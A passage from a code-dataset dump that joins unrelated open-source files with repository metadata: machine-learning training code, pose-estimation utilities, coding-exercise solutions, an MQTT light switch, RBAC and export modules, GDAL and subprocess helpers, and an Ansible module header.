neg_embedding = self.dropout(neg_cls_embedding)
pos_sim = self.similarity(pos_embedding)
neg_sim = self.similarity(neg_embedding)
pos_sim = F.sigmoid(pos_sim)
neg_sim = F.sigmoid(neg_sim)
labels = paddle.full(shape=[pos_cls_embedding.shape[0]],
fill_value=1.0,
dtype='float32')
loss = F.margin_ranking_loss(pos_sim,
neg_sim,
labels,
margin=self.margin)
return loss
| 33.915888 | 77 | 0.606503 |
07cabae4faaff6e4fe9099e5b710debcc1f4036d
| 10,532 |
py
|
Python
|
rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 6 |
2021-09-25T03:53:06.000Z
|
2022-02-19T03:25:11.000Z
|
rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 1 |
2021-07-21T13:14:54.000Z
|
2021-07-21T13:14:54.000Z
|
rfvision/models/pose_estimators/articulation/optimization/utils.py
|
mvig-robotflow/rfvision
|
cc662f213dfe5a3e8864a6b5685a668a4436e397
|
[
"Apache-2.0"
] | 2 |
2021-07-16T03:25:04.000Z
|
2021-11-22T06:04:01.000Z
|
import numpy as np
from scipy.optimize import linear_sum_assignment
DIVISION_EPS = 1e-10
from scipy.spatial.transform import Rotation as srot
from scipy.optimize import least_squares
def get_3d_bbox(scale, shift = 0):
"""
Input:
scale: [3] or scalar
shift: [3] or scalar
Return
bbox_3d: [3, N]
"""
if hasattr(scale, "__iter__"):
bbox_3d = np.array([[scale[0] / 2, +scale[1] / 2, scale[2] / 2],
[scale[0] / 2, +scale[1] / 2, -scale[2] / 2],
[-scale[0] / 2, +scale[1] / 2, scale[2] / 2],
[-scale[0] / 2, +scale[1] / 2, -scale[2] / 2],
[+scale[0] / 2, -scale[1] / 2, scale[2] / 2],
[+scale[0] / 2, -scale[1] / 2, -scale[2] / 2],
[-scale[0] / 2, -scale[1] / 2, scale[2] / 2],
[-scale[0] / 2, -scale[1] / 2, -scale[2] / 2]]) + shift
else:
bbox_3d = np.array([[scale / 2, +scale / 2, scale / 2],
[scale / 2, +scale / 2, -scale / 2],
[-scale / 2, +scale / 2, scale / 2],
[-scale / 2, +scale / 2, -scale / 2],
[+scale / 2, -scale / 2, scale / 2],
[+scale / 2, -scale / 2, -scale / 2],
[-scale / 2, -scale / 2, scale / 2],
[-scale / 2, -scale / 2, -scale / 2]]) +shift
bbox_3d = bbox_3d.transpose()
return bbox_3d
def rotate_pts(source, target):
# compute rotation between source: [N x 3], target: [N x 3]
# pre-centering
source = source - np.mean(source, 0, keepdims=True)
target = target - np.mean(target, 0, keepdims=True)
M = np.matmul(target.T, source)
U, D, Vh = np.linalg.svd(M, full_matrices=True)
d = (np.linalg.det(U) * np.linalg.det(Vh)) < 0.0
if d:
D[-1] = -D[-1]
U[:, -1] = -U[:, -1]
R = np.matmul(U, Vh)
return R
def scale_pts(source, target):
# compute scaling factor between source: [N x 3], target: [N x 3]
pdist_s = source.reshape(source.shape[0], 1, 3) - source.reshape(1, source.shape[0], 3)
A = np.sqrt(np.sum(pdist_s**2, 2)).reshape(-1)
pdist_t = target.reshape(target.shape[0], 1, 3) - target.reshape(1, target.shape[0], 3)
b = np.sqrt(np.sum(pdist_t**2, 2)).reshape(-1)
scale = np.dot(A, b) / (np.dot(A, A)+1e-6)
return scale
def rot_diff_rad(rot1, rot2):
return np.arccos( ( np.trace(np.matmul(rot1, rot2.T)) - 1 ) / 2 ) % (2*np.pi)
def rot_diff_degree(rot1, rot2):
return rot_diff_rad(rot1, rot2) / np.pi * 180
def ransac(dataset, model_estimator, model_verifier, inlier_th, niter=10000, joint_type='revolute'):
best_model = None
best_score = -np.inf
best_inliers = None
for i in range(niter):
cur_model = model_estimator(dataset, joint_type=joint_type)
cur_score, cur_inliers = model_verifier(dataset, cur_model, inlier_th)
if cur_score > best_score:
best_model = cur_model
best_inliers = cur_inliers
best_model = model_estimator(dataset, best_inliers, joint_type=joint_type)
return best_model, best_inliers
def joint_transformation_estimator(dataset, best_inliers = None, joint_type='revolute'):
# dataset: dict, fields include source0, target0, nsource0,
# source1, target1, nsource1, joint_direction
if best_inliers is None:
sample_idx0 = np.random.randint(dataset['nsource0'], size=3)
sample_idx1 = np.random.randint(dataset['nsource1'], size=3)
else:
sample_idx0 = best_inliers[0]
sample_idx1 = best_inliers[1]
source0 = dataset['source0'][sample_idx0, :]
target0 = dataset['target0'][sample_idx0, :]
source1 = dataset['source1'][sample_idx1, :]
target1 = dataset['target1'][sample_idx1, :]
# prescaling and centering
scale0 = scale_pts(source0, target0)
scale1 = scale_pts(source1, target1)
scale0_inv = scale_pts(target0, source0) # check if could simply take reciprocal
scale1_inv = scale_pts(target1, source1)
target0_scaled_centered = scale0_inv*target0
target0_scaled_centered -= np.mean(target0_scaled_centered, 0, keepdims=True)
source0_centered = source0 - np.mean(source0, 0, keepdims=True)
target1_scaled_centered = scale1_inv*target1
target1_scaled_centered -= np.mean(target1_scaled_centered, 0, keepdims=True)
source1_centered = source1 - np.mean(source1, 0, keepdims=True)
# joint optimization
# joint_points0 = np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
# joint_points1 = np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
joint_points0 = np.ones_like(np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1)))*dataset['joint_direction'].reshape((1, 3))
joint_points1 = np.ones_like(np.linspace(0, 1, num = np.min((source0.shape[0], source1.shape[0]))+1 )[1:].reshape((-1, 1)))*dataset['joint_direction'].reshape((1, 3))
joint_axis = dataset['joint_direction'].reshape((1, 3))
# joint_points0 = np.linspace(0, 1, num = source1.shape[0]+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
# joint_points1 = np.linspace(0, 1, num = source0.shape[0]+1 )[1:].reshape((-1, 1))*dataset['joint_direction'].reshape((1, 3))
R0 = rotate_pts(source0_centered, target0_scaled_centered)
R1 = rotate_pts(source1_centered, target1_scaled_centered)
rdiff0 = np.inf
rdiff1 = np.inf
niter = 100
degree_th = 0.1
isalternate = False
isdirect = False
if not isalternate:
rotvec0 = srot.from_dcm(R0).as_rotvec()
rotvec1 = srot.from_dcm(R1).as_rotvec()
# print('initialize rotvec0 vs rotvec1: \n', rotvec0, rotvec1)
if joint_type == 'prismatic':
res = least_squares(objective_eval_r, np.hstack((rotvec0, rotvec1)), verbose=0, ftol=1e-4, method='lm',
args=(source0_centered, target0_scaled_centered, source1_centered, target1_scaled_centered, joint_points0, False))
elif joint_type == 'revolute':
res = least_squares(objective_eval, np.hstack((rotvec0, rotvec1)), verbose=0, ftol=1e-4, method='lm',
args=(source0_centered, target0_scaled_centered, source1_centered, target1_scaled_centered, joint_points0, False))
R0 = srot.from_rotvec(res.x[:3]).as_dcm()
R1 = srot.from_rotvec(res.x[3:]).as_dcm()
else:
for i in range(niter):
if rdiff0<=degree_th and rdiff1<=degree_th:
break
newsrc0 = np.concatenate( (source0_centered, joint_points0), 0 )
newtgt0 = np.concatenate( (target0_scaled_centered, np.matmul( joint_points0, R1.T ) ), 0 )
newR0 = rotate_pts( newsrc0, newtgt0 )
rdiff0 = rot_diff_degree(R0, newR0)
R0 = newR0
newsrc1 = np.concatenate( (source1_centered, joint_points1), 0 )
newtgt1 = np.concatenate( (target1_scaled_centered, np.matmul( joint_points1, R0.T ) ), 0 )
newR1 = rotate_pts( newsrc1, newtgt1 )
rdiff1 = rot_diff_degree(R1, newR1)
R1 = newR1
translation0 = np.mean(target0.T-scale0*np.matmul(R0, source0.T), 1)
translation1 = np.mean(target1.T-scale1*np.matmul(R1, source1.T), 1)
# if joint_type == 'prismatic': # todo best_inliers is not None and
# res = least_squares(objective_eval_t, np.hstack((translation0, translation1)), verbose=0, ftol=1e-4, method='lm',
# args=(source0, target0, source1, target1, joint_axis, R0, R1, scale0, scale1, False))
# translation0 = res.x[:3]
# translation1 = res.x[3:]
jtrans = dict()
jtrans['rotation0'] = R0
jtrans['scale0'] = scale0
jtrans['translation0'] = translation0
jtrans['rotation1'] = R1
jtrans['scale1'] = scale1
jtrans['translation1'] = translation1
return jtrans
def joint_transformation_verifier(dataset, model, inlier_th):
# dataset: dict, fields include source, target, nsource, ntarget
# model: dict, fields include rotation, scale, translation
res0 = dataset['target0'].T - model['scale0'] * np.matmul( model['rotation0'], dataset['source0'].T ) - model['translation0'].reshape((3, 1))
inliers0 = np.sqrt(np.sum(res0**2, 0)) < inlier_th
res1 = dataset['target1'].T - model['scale1'] * np.matmul( model['rotation1'], dataset['source1'].T ) - model['translation1'].reshape((3, 1))
inliers1 = np.sqrt(np.sum(res1**2, 0)) < inlier_th
score = ( np.sum(inliers0)/res0.shape[0] + np.sum(inliers1)/res1.shape[0] ) / 2
return score, [inliers0, inliers1]
def rotate_points_with_rotvec(points, rot_vecs):
"""Rotate points by given rotation vectors.
Rodrigues' rotation formula is used.
"""
theta = np.linalg.norm(rot_vecs, axis=1)[:, np.newaxis]
with np.errstate(invalid='ignore'):
v = rot_vecs / theta
v = np.nan_to_num(v)
dot = np.sum(points * v, axis=1)[:, np.newaxis]
cos_theta = np.cos(theta)
sin_theta = np.sin(theta)
return cos_theta * points + sin_theta * np.cross(v, points) + dot * (1 - cos_theta) * v
def objective_eval(params, x0, y0, x1, y1, joints, isweight=True):
# params: [:3] R0, [3:] R1
# x0: N x 3, y0: N x 3, x1: M x 3, y1: M x 3, R0: 1 x 3, R1: 1 x 3, joints: K x 3
rotvec0 = params[:3].reshape((1,3))
rotvec1 = params[3:].reshape((1,3))
res0 = y0 - rotate_points_with_rotvec(x0, rotvec0)
res1 = y1 - rotate_points_with_rotvec(x1, rotvec1)
res_joint = rotate_points_with_rotvec(joints, rotvec0) - rotate_points_with_rotvec(joints, rotvec1)
if isweight:
res0 /= x0.shape[0]
res1 /= x1.shape[0]
res_joint /= joints.shape[0]
return np.concatenate((res0, res1, res_joint), 0).ravel()
def objective_eval_r(params, x0, y0, x1, y1, joints, isweight=True, joint_type='prismatic'):
# params: [:3] R0, [3:] R1
# x0: N x 3, y0: N x 3, x1: M x 3, y1: M x 3, R0: 1 x 3, R1: 1 x 3, joints: K x 3
rotvec0 = params[:3].reshape((1,3))
rotvec1 = params[3:].reshape((1,3))
res0 = y0 - rotate_points_with_rotvec(x0, rotvec0)
res1 = y1 - rotate_points_with_rotvec(x1, rotvec1)
res_R= rotvec0 - rotvec1
if isweight:
res0 /= x0.shape[0]
res1 /= x1.shape[0]
return np.concatenate((res0, res1, res_R), 0).ravel()
| 45.008547 | 170 | 0.618686 |
07fd1b2c7aa0339bc5336360c12584bc516707ea
| 596 |
py
|
Python
|
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
HackerP/introduction/if-else.py
|
JKChang2015/hackerrank
|
5e5bd6892d2e4754e73f73eecfa8f4b9f266c3bd
|
[
"MIT"
] | null | null | null |
# if-else
# Created by JKChang
# 14/08/2018, 10:48
# Tag:
# Description: https://www.hackerrank.com/challenges/py-if-else/problem
# Task
# Given an integer, , perform the following conditional actions:
# If n is odd, print Weird
# If n is even and in the inclusive range of 2 to 5, print Not Weird
# If n is even and in the inclusive range of 6 to 20, print Weird
# If n is even and greater than 20, print Not Weird
N = int(input())
if N % 2 != 0:
print('Weird')
elif N >= 2 and N <= 5:
print("Not Weird")
elif N >= 6 and N <= 20:
print("Weird")
elif N > 20:
print("Not Weird")
| 25.913043 | 71 | 0.659396 |
6af4f8a95d4bffa2f0750024747d51d370bb62b1
| 830 |
py
|
Python
|
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
Edzna/device/light.py
|
xe1gyq/veracruz
|
6094d511998705245fc9f25158cc496de5871db3
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
import paho.mqtt.client as paho
import time
from upm import pyupm_grove as grove
from threading import Thread
relay = grove.GroveRelay(2)
def functionDataActuatorMqttOnMessage(mosq, obj, msg):
if msg.payload == "ON":
relay.on()
elif msg.payload == "OFF":
relay.off()
def functionDataActuatorMqttSubscribe():
mqttclient = paho.Client()
mqttclient.connect("iot.eclipse.org", 1883, 60)
mqttclient.subscribe("edzna/principal/light/switch", 0)
mqttclient.on_message = functionDataActuatorMqttOnMessage
while mqttclient.loop() == 0:
pass
if __name__ == '__main__':
threadmqttsubscribe = Thread(target=functionDataActuatorMqttSubscribe)
threadmqttsubscribe.start()
print "Hello Edzna @ Light"
while True:
time.sleep(5)
# End of File
| 23.055556 | 74 | 0.704819 |
ed5ad2b45c938c466e78d684f183e21c386d63e1
| 292 |
py
|
Python
|
pacman-arch/test/pacman/tests/upgrade-download-404.py
|
Maxython/pacman-for-termux
|
3b208eb9274cbfc7a27fca673ea8a58f09ebad47
|
[
"MIT"
] | 23 |
2021-05-21T19:11:06.000Z
|
2022-03-31T18:14:20.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade-download-404.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 11 |
2021-05-21T12:08:44.000Z
|
2021-12-21T08:30:08.000Z
|
source/pacman-6.0.1/test/pacman/tests/upgrade-download-404.py
|
Scottx86-64/dotfiles-1
|
51004b1e2b032664cce6b553d2052757c286087d
|
[
"Unlicense"
] | 1 |
2021-09-26T08:44:40.000Z
|
2021-09-26T08:44:40.000Z
|
self.description = 'download a remote package with -U'
self.require_capability("curl")
url = self.add_simple_http_server({})
self.args = '-Uw {url}/foo.pkg'.format(url=url)
self.addrule('!PACMAN_RETCODE=0')
self.addrule('!CACHE_FEXISTS=foo.pkg')
self.addrule('!CACHE_FEXISTS=foo.pkg.sig')
| 26.545455 | 54 | 0.743151 |
ed883109701131cf59521492da50992dbb717e73
| 2,097 |
py
|
Python
|
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
Python/Basic_Data_Types/Nested_List.py
|
vinayvinu500/Hackerrank
|
e185ae9d3c7dc5cd661761142e436f5df6a3f0f1
|
[
"MIT"
] | null | null | null |
# user input
# https://www.hackerrank.com/challenges/nested-list/problem?h_r=internal-search
if __name__ == '__main__':
z = int(input())
phy = []
grd = []
for _ in range(z):
name = input().strip()
score = float(input().strip())
phy.append([name, score])
grd.append(score)
pass
phy.sort()
grd.sort()
sco = grd[1]
cou = grd.count(sco)
if cou == 1:
for i in range(len(phy)):
if sco == phy[i][1]:
key, val = phy[i]
output = [key]
print(output[0])
pass
else:
for i in range(len(phy)):
if sco == phy[i][1]:
key, val = phy[i]
output = [key]
output.sort()
for j in output:
print(j)
pass
pass
"""
5
Harry
37.21
Berry
37.21
Tina
37.2
Akriti
41
Harsh
39
"""
"""
arr = []
sc = []
# method 2
z = int(input())
arr = [[input().strip(), float(input())] for _ in range(z)]
print(arr)
"""
"""
# method 1
# for loop integration
z = int(input())
for i in range(z):
name = input().strip()
score = input().strip()
arr.append([name, score])
sc.append(score)
pass
x = 1
y = 0
mi = min(sc)
co = sc.count(mi)
# if first least is more
if co > 1:
for i in range(co):
sc.remove(mi)
pass
elif co == 1:
sc.remove(mi)
# if second least is more
mi = min(sc)
co = sc.count(mi)
# if count is more than 1
if co > 1:
output = []
for i in range(z):
val, key = arr[i][x], arr[i][y]
if val == mi:
output.append(key)
pass
output.sort()
for i in output:
print(i)
pass
# if count is equal to 1
elif co == 1:
output = []
for i in range(z):
val,key = arr[i][x],arr[i][y]
if val == mi:
output.append(key)
pass
output.sort()
for i in output:
print(i)
pass
"""
"""
Examples
5
Harry
37.2
Berry
37.21
Tina
37.2
Akriti
41
Harsh
39
"""
| 17.330579 | 79 | 0.475918 |
1354adf16fee81dd47462e4e0595a247769f4e57
| 146 |
py
|
Python
|
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
python_lessons/Textastic_Files/Python SQLite Tutorial - MtMk/app2.py
|
1986MMartin/coding-sections-markus
|
e13be32e5d83e69250ecfb3c76a04ee48a320607
|
[
"Apache-2.0"
] | null | null | null |
import formular
def menu():
myroot = formular.root()
formular.form_body(root, name='Markus Martin - 2020', geometry="500x500")
menu()
| 14.6 | 77 | 0.678082 |
b96f0b3b1633e91d1101afa17159304c1f00a842
| 2,119 |
py
|
Python
|
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | null | null | null |
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | 1 |
2018-09-10T19:12:31.000Z
|
2018-09-10T19:12:31.000Z
|
rbac/common/task/relationship_owner.py
|
akgunkel/sawtooth-next-directory
|
a88833033ab30e9091479a38947f04c5e396ca46
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Implementation of the Task-Owner relationship
Usage: rbac.task.owner.exists(task_id, user_id)
"""
import logging
from rbac.common import addresser
from rbac.common.base.base_relationship import BaseRelationship
from rbac.common.task.propose_owner import ProposeAddTaskOwner
from rbac.common.task.confirm_owner import ConfirmAddTaskOwner
from rbac.common.task.reject_owner import RejectAddTaskOwner
LOGGER = logging.getLogger(__name__)
class OwnerRelationship(BaseRelationship):
"""Implementation of the Task-Owner relationship
Usage: rbac.task.owner.exists(task_id, user_id)
"""
def __init__(self):
super().__init__()
self.propose = ProposeAddTaskOwner()
self.confirm = ConfirmAddTaskOwner()
self.reject = RejectAddTaskOwner()
@property
def address_type(self):
"""The address type from AddressSpace implemented by this class"""
return addresser.AddressSpace.TASKS_OWNERS
@property
def object_type(self):
"""The object type from AddressSpace implemented by this class"""
return addresser.ObjectType.TASK
@property
def related_type(self):
"""The related type from AddressSpace implemented by this class"""
return addresser.ObjectType.USER
@property
def relationship_type(self):
"""The related type from AddressSpace implemented by this class"""
return addresser.RelationshipType.OWNER
| 35.915254 | 79 | 0.716848 |
e072226f51f92cfe1559caecc99b5dd3a96598e4
| 2,636 |
py
|
Python
|
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
src/onegov/feriennet/exports/occasion.py
|
politbuero-kampagnen/onegov-cloud
|
20148bf321b71f617b64376fe7249b2b9b9c4aa9
|
[
"MIT"
] | null | null | null |
from onegov.activity import Activity, Occasion, OccasionNeed
from onegov.core.security import Secret
from onegov.feriennet import FeriennetApp, _
from onegov.feriennet.exports.base import FeriennetExport
from onegov.feriennet.forms import PeriodExportForm
from sqlalchemy.orm import joinedload, undefer
@FeriennetApp.export(
id='durchfuehrungen',
form_class=PeriodExportForm,
permission=Secret,
title=_("Occasions"),
explanation=_("Exports activities with an occasion in the given period."),
)
class OccasionExport(FeriennetExport):
def run(self, form, session):
return self.rows(session, form.selected_period)
def query(self, session, period):
q = session.query(Occasion)
q = q.filter(Occasion.period_id == period.id)
q = q.options(joinedload(Occasion.activity).joinedload(Activity.user))
q = q.options(joinedload(Occasion.period))
q = q.options(undefer('*'))
q = q.order_by(Occasion.order)
return q
def rows(self, session, period):
for occasion in self.query(session, period):
yield ((k, v) for k, v in self.fields(occasion))
def fields(self, occasion):
yield from self.activity_fields(occasion.activity)
yield from self.occasion_fields(occasion)
yield from self.user_fields(occasion.activity.user)
@FeriennetApp.export(
id='bedarf',
form_class=PeriodExportForm,
permission=Secret,
title=_("Needs"),
explanation=_("Exports occasion needs."),
)
class OccasionNeedExport(FeriennetExport):
def run(self, form, session):
return self.rows(session, form.selected_period)
def query(self, session, period):
q = session.query(OccasionNeed)
q = q.filter(OccasionNeed.occasion_id.in_(
session.query(Occasion.id)
.filter(Occasion.period_id == period.id)
.subquery()
))
q = q.join(Occasion)
q = q.options(
joinedload(OccasionNeed.occasion)
.joinedload(Occasion.activity)
)
q = q.options(
joinedload(OccasionNeed.occasion)
.joinedload(Occasion.period)
)
q = q.options(undefer('*'))
q = q.order_by(Occasion.order, OccasionNeed.name)
return q
def rows(self, session, period):
for need in self.query(session, period):
yield ((k, v) for k, v in self.fields(need))
def fields(self, need):
yield from self.activity_fields(need.occasion.activity)
yield from self.occasion_fields(need.occasion)
yield from self.occasion_need_fields(need)
| 32.146341 | 78 | 0.66085 |
161a4718a27f59f00dbdb084c8228aba2a082557
| 469 |
py
|
Python
|
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
python/gdal_cookbook/cookbook_geometry/create_multi_point.py
|
zeroam/TIL
|
43e3573be44c7f7aa4600ff8a34e99a65cbdc5d1
|
[
"MIT"
] | null | null | null |
from osgeo import ogr
multipoint = ogr.Geometry(ogr.wkbMultiPoint)
point1 = ogr.Geometry(ogr.wkbPoint)
point1.AddPoint(1251243.7361610543, 598078.7958668759)
multipoint.AddGeometry(point1)
point2 = ogr.Geometry(ogr.wkbPoint)
point2.AddPoint(1240605.8570339603, 601778.9277371694)
multipoint.AddGeometry(point2)
point3 = ogr.Geometry(ogr.wkbPoint)
point3.AddPoint(1250318.7031934808, 606404.0925750365)
multipoint.AddGeometry(point3)
print(multipoint.ExportToWkt())
| 27.588235 | 54 | 0.82516 |
16b4938010cec31f08db802278c4e1f91ad43779
| 654 |
py
|
Python
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 1 |
2021-11-21T06:03:06.000Z
|
2021-11-21T06:03:06.000Z
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | 2 |
2021-10-13T07:21:09.000Z
|
2021-11-14T13:53:08.000Z
|
06.BinarySearch/min/B2003-M.py
|
SP2021-2/Algorithm
|
2e629eb5234212fad8bbc11491aad068e5783780
|
[
"MIT"
] | null | null | null |
num , need = map(int, input().split())
arr = list(map(int, input().split()))
#sys.stdin.readline().strip()
i = 0
j = 0
check = 0;
sum = 0
while i <= len(arr):
if(i != len(arr)):
if sum < need:
sum += arr[i]
i += 1
elif sum > need:
sum -= arr[j]
j += 1
else :
if sum > need:
sum -= arr[j]
j += 1
else:
i += 1
if sum == need:
check += 1
sum -= arr[j]
j += 1
#print("i", i)
#print("j" ,j)
#print("check" , check)
#print("sum",sum)
print (check)
| 17.210526 | 38 | 0.370031 |
4c03f05ac08e397a246b791f9839134aadf9e573
| 615 |
py
|
Python
|
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 1 |
2015-08-02T09:53:18.000Z
|
2015-08-02T09:53:18.000Z
|
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | null | null | null |
pytgt/process_call.py
|
lihuiba/SoftSAN
|
1b8ab2cae92b7aac34211909b27d4ebe595275d7
|
[
"Apache-2.0"
] | 2 |
2018-03-21T04:59:50.000Z
|
2019-12-03T15:54:17.000Z
|
import subprocess
# change the type of output below
def process_call_argv(argv):
process = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False)
output = ""
while True:
out = process.stdout.readline()
if out == '' and process.poll() != None: break
output += out
return (process.returncode, output)
def process_reload_argv(argv):
process = subprocess.Popen(argv, stdout=subprocess.PIPE, shell=False)
outlist = []
while True:
out = process.stdout.readline()
if out == '' and process.poll() != None: break
outlist.append(out)
return (process.returncode, outlist)
| 29.285714 | 71 | 0.687805 |
4c2cd86a521f87f65028a699fd533401429b060a
| 2,285 |
py
|
Python
|
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
examples/language_model/rnnlm/train.py
|
mukaiu/PaddleNLP
|
0315365dbafa6e3b1c7147121ba85e05884125a5
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
import paddle
import numpy as np
from model import RnnLm, CrossEntropyLossForLm, UpdateModel
from args import parse_args
from reader import create_data_loader
from paddlenlp.metrics import Perplexity
paddle.seed(102)
def train(args):
paddle.set_device(args.device)
data_path = args.data_path
train_loader, valid_loader, test_loader, vocab_size = create_data_loader(
batch_size=args.batch_size,
num_steps=args.num_steps,
data_path=data_path)
network = RnnLm(vocab_size=vocab_size,
hidden_size=args.hidden_size,
batch_size=args.batch_size,
num_layers=args.num_layers,
init_scale=args.init_scale,
dropout=args.dropout)
gloabl_norm_clip = paddle.nn.ClipGradByGlobalNorm(args.max_grad_norm)
cross_entropy = CrossEntropyLossForLm()
ppl_metric = Perplexity()
callback = UpdateModel()
scheduler = paddle.callbacks.LRScheduler(by_step=False, by_epoch=True)
model = paddle.Model(network)
learning_rate = paddle.optimizer.lr.LambdaDecay(
learning_rate=args.base_lr,
lr_lambda=lambda x: args.lr_decay**max(x + 1 - args.epoch_start_decay,
0.0),
verbose=True)
optimizer = paddle.optimizer.SGD(learning_rate=learning_rate,
parameters=model.parameters(),
grad_clip=gloabl_norm_clip)
model.prepare(optimizer=optimizer, loss=cross_entropy, metrics=ppl_metric)
if args.init_from_ckpt:
model.load(args.init_from_ckpt)
print("Loaded checkpoint from %s" % args.init_from_ckpt)
benchmark_logger = paddle.callbacks.ProgBarLogger(
log_freq=(len(train_loader) // 10), verbose=3)
model.fit(train_data=train_loader,
eval_data=valid_loader,
epochs=args.max_epoch,
shuffle=False,
callbacks=[callback, scheduler, benchmark_logger])
model.save(path='checkpoint/test') # save for training
print('Start to evaluate on test dataset...')
model.evaluate(test_loader, log_freq=len(test_loader))
if __name__ == '__main__':
args = parse_args()
train(args)
| 33.602941 | 78 | 0.659519 |
d5c4c4bf4f222c33080b0b11b56c9f08c4800284
| 3,268 |
py
|
Python
|
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/digital_ocean_tag_info.py
|
tr3ck3r/linklight
|
5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Ansible Project
# Copyright: (c) 2018, Abhijeet Kasurde <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: digital_ocean_tag_info
short_description: Gather information about DigitalOcean tags
description:
- This module can be used to gather information about DigitalOcean provided tags.
- This module was called C(digital_ocean_tag_facts) before Ansible 2.9. The usage did not change.
author: "Abhijeet Kasurde (@Akasurde)"
options:
tag_name:
description:
- Tag name that can be used to identify and reference a tag.
required: false
requirements:
